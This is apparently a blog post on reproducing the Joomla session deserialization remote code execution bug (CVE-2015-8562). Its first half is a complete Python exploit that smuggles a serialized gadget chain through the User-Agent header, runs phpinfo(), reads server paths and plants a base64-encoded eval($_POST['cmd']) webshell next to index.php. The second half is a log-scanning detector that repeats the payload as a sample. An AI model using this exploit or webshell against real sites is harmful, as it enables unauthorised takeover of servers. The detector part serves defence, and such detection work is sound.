Pitfalls in reproducing the Joomla deserialization RCE that hits every version below 3.4.5

This post walks through reproducing the remote code execution vulnerability that affects Joomla releases below 3.4.5 (the session deserialization bug, CVE-2015-8562, fixed in 3.4.6; the "Joomla 3.6" keyword attached to this page refers to a version that is not affected) against a MySQL-backed Joomla install. The Python script below delivers the payload through the User-Agent header, reads the target's System, DOCUMENT_ROOT and SCRIPT_FILENAME values out of the phpinfo() page that the payload produces, and uses them to drop a webshell next to index.php, which both confirms the vulnerability and shows its impact.
Summary generated automatically by CSDN.

```python
#!/usr/bin/env python3
# PoC for the Joomla 1.5 - 3.4.5 session deserialization RCE (CVE-2015-8562).
# Usage: python3 joomla_rce.py http://target/
#
# Whether this reproduces depends on the stack, not only on the Joomla version:
# the session table must use the 3-byte 'utf8' charset with MySQL not in strict
# mode (strict mode rejects the row instead of truncating it), and PHP must
# still skip a broken session entry and keep parsing the rest of the session
# data (later 5.x releases stop at the first failure).
import re
import sys
import time

import requests


def rceJoomla(value):
    now = time.strftime('%H:%M:%S', time.localtime(time.time()))
    print("[" + str(now) + "] [INFO] Checking Joomla 1.5 - 3.4.5 Remote Code Execution...")
    if 'http://' in value or 'https://' in value:
        url = value
        checkJoomlaRCE(url)


def checkJoomlaRCE(url):
    url = url.strip()
    # Make sure the URL ends with a slash.
    if not re.match(r'http[s]*://.*/$', url):
        url = url + "/"
    poc = generate_payload("phpinfo();")
    try:
        result = get_url(url, poc)
        if 'phpinfo()' in result:
            system = getInfoByJoomlaRCE(result, 'System')
            document_root = getInfoByJoomlaRCE(result, 'DOCUMENT_ROOT')
            script_filename = getInfoByJoomlaRCE(result, 'SCRIPT_FILENAME')
            shell_file = getShellByJoomlaRCE(url, system, script_filename)
            vuls = ('[+]vuls found! url: ' + url
                    + '\n[+]System: ' + system
                    + '\n[+]document_root: ' + document_root
                    + '\n[+]script_filename: ' + script_filename
                    + '\n[+]shell_file: ' + shell_file)
            print(vuls)
        else:
            print('[!] no vuls! url: ' + url)
    except Exception as e:
        print('[!] connection failed! url: ' + url + ' (' + str(e) + ')')


def get_url(url, user_agent):
    # The payload travels in the User-Agent header. The first request makes
    # Joomla write it into the session row (where MySQL truncates it at the
    # 4-byte character); the second request, carrying the same session cookie,
    # reads the row back and unserializes the injected object graph.
    headers = {'User-Agent': user_agent}
    cookies = requests.get(url, headers=headers).cookies
    last_error = None
    for _ in range(3):  # retry transient connection errors
        try:
            response = requests.get(url, timeout=10, headers=headers, cookies=cookies)
            return response.text
        except requests.RequestException as e:
            last_error = e
    raise last_error


def generate_payload(php_payload):
    # U+1D306 in UTF-8: a 4-byte sequence that a 3-byte 'utf8' MySQL column
    # cannot hold, so (in non-strict mode) the stored session data is cut off
    # right here. The truncation breaks the serialized '__default' entry that
    # holds the User-Agent, and PHP's session decoder then picks up the
    # '}__test|...' object below as a separate session variable.
    terminate = b'\xf0\x9d\x8c\x86'
    # Raw strings on purpose: Joomla's database session storage replaces the
    # NUL*NUL marker of protected properties with the literal text '\0\0\0' on
    # write and turns it back into NUL*NUL on read, so the payload must carry
    # the backslashes literally; s:21 and s:13 are the lengths after that
    # conversion.
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    # feed_url is what SimplePie::init() hands to cache_name_function (assert).
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'''
    # Return bytes so the terminator reaches the wire as exactly these four bytes.
    return exploit_template.encode('utf-8') + terminate


def getInfoByJoomlaRCE(result, param):
    # phpinfo() prints each entry as <td class="e">NAME </td><td class="v">VALUE</td>;
    # DOCUMENT_ROOT and SCRIPT_FILENAME also appear as $_SERVER['...'] rows.
    reg = re.escape(param) + r"(?:'\])?\s*</td>\s*<td class=\"v\">([^<>]*?)</td>"
    match_url = re.search(reg, result)
    if match_url:
        info = match_url.group(1).strip()
    else:
        info = 'no info!'
    return info


def getShellByJoomlaRCE(url, system, script_filename):
    if 'no info' not in script_filename and 'no info' not in system:
        if 'Windows' in system:
            shell = script_filename.split('index.php')[0].replace('/', '//').strip() + "shell.php"
        else:
            shell = script_filename.split('index.php')[0] + "shell.php"
        # Drop a one-line webshell next to index.php; the base64 decodes to
        # <?php @eval($_POST['cmd']); ?>
        cmd = ("file_put_contents('" + shell + "',"
               "base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7ID8+'));")
        pl = generate_payload(cmd)
        try:
            get_url(url, pl)
            return url + "shell.php"
        except Exception:
            return "no info!"
    else:
        return "no info!"


def main():
    if len(sys.argv) != 2:
        print("usage: %s http://target/" % sys.argv[0])
        sys.exit(1)
    rceJoomla(sys.argv[1])


if __name__ == '__main__':
    main()
```
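Because the PoC above carries the whole serialized gadget chain in the User-Agent, every attempt leaves a distinctive trace in the web server's access log. The following Python 3 detector is an added example (not code from the original post or from the Joomla project): it undoes Apache's log escaping, flags serialized PHP objects of the Joomla gadget classes in the User-Agent field, checks for the 4-byte UTF-8 character that drives the MySQL truncation trick, and pulls out the injected PHP. The log lines, IP addresses and timestamps are constructed for the example; the exploit User-Agent is rendered through Apache's escaping rules the way the server would write it.

```python
#!/usr/bin/env python3
"""Hunt for CVE-2015-8562 (Joomla 1.5 - 3.4.5 session deserialization) attempts
in an Apache combined-format access log. Added example; the log lines, IPs and
timestamps are constructed, not captured from a real server."""
import re

# PHP serialized-object header: O:<len>:"<class>":<nprops>:{
OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')
# Classes of the public gadget chain (JDatabaseDriverMysqli::__destruct ->
# disconnectHandlers -> SimplePie::init -> assert(feed_url)).
GADGET_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                  "SimplePie", "JSimplepieFactory"}
# The PoC stores "<php>;JFactory::getConfig();exit" in SimplePie's feed_url.
PHP_RE = re.compile(r'feed_url";s:\d+:"(.*?);JFactory::getConfig\(\);exit"', re.S)
# Combined log format; quoted fields may hold backslash-escaped characters.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"')


def escape_apache(value: bytes) -> str:
    """Render a header value as Apache logs it: '"' and '\\' get a backslash,
    non-printable bytes (every byte of a non-ASCII UTF-8 sequence) become \\xHH."""
    out = []
    for b in value:
        if b in (0x22, 0x5C):
            out.append('\\' + chr(b))
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append('\\x%02x' % b)
    return ''.join(out)


def unescape_apache(field: str) -> bytes:
    """Inverse of escape_apache: recover the raw bytes of a logged field."""
    def repl(m):
        esc = m.group(1)
        return bytes.fromhex(esc[1:].decode()) if esc.startswith(b'x') else esc
    return re.sub(rb'\\(x[0-9a-fA-F]{2}|["\\])', repl, field.encode('utf-8'))


def analyze_user_agent(raw: bytes) -> dict:
    """Classify one User-Agent. Serialized PHP objects never belong in a UA; the
    Joomla gadget classes plus a 4-byte UTF-8 character (the MySQL truncation
    trick) pin it to this exploit."""
    text = raw.decode('utf-8', errors='replace')
    classes = OBJECT_RE.findall(text)
    m = PHP_RE.search(text)
    return {
        'serialized_classes': classes,
        'joomla_gadget': bool(set(classes) & GADGET_CLASSES),
        # 0xF0-0xF4 lead a 4-byte UTF-8 sequence, which a 3-byte 'utf8' MySQL
        # column cannot store and (in non-strict mode) truncates at.
        'has_4byte_utf8': any(0xF0 <= b <= 0xF4 for b in raw),
        'php_payload': m.group(1) if m else None,
    }


def scan_log(lines):
    """One alert dict per access-log line whose User-Agent carries the chain."""
    alerts = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        verdict = analyze_user_agent(unescape_apache(m.group('ua')))
        if verdict['joomla_gadget']:
            alerts.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                           'request': m.group('req'), **verdict})
    return alerts


# Constructed sample: the PoC's User-Agent (literal "\0\0\0", which Joomla's
# database session storage maps back to the NUL*NUL protected-property marker,
# and U+1D306 = F0 9D 8C 86 as the truncator) next to an ordinary browser.
EXPLOIT_UA = (
    r'}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
    r's:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'
    r's:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'
    r's:37:"phpinfo();;JFactory::getConfig();exit";s:19:"cache_name_function";'
    r's:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}'
    r'i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'
).encode() + b'\xf0\x9d\x8c\x86'

SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2016:12:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/43.0"',
    '198.51.100.9 - - [10/Jan/2016:12:00:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "'
    + escape_apache(EXPLOIT_UA) + '"',
    '198.51.100.9 - - [10/Jan/2016:12:00:03 +0000] "GET / HTTP/1.1" 200 71233 "-" "'
    + escape_apache(EXPLOIT_UA) + '"',
]

if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(a['ts'], a['ip'], a['serialized_classes'], repr(a['php_payload']))
```

Two requests from the same client with the same serialized User-Agent, a few seconds apart, is exactly the store-then-trigger pattern of the PoC, so correlating alerts by source address and time separates a real attempt from a scanner that only sends the payload once. The X-Forwarded-For header is stored in the session the same way and is worth scanning with the same `analyze_user_agent` check if your log format records it.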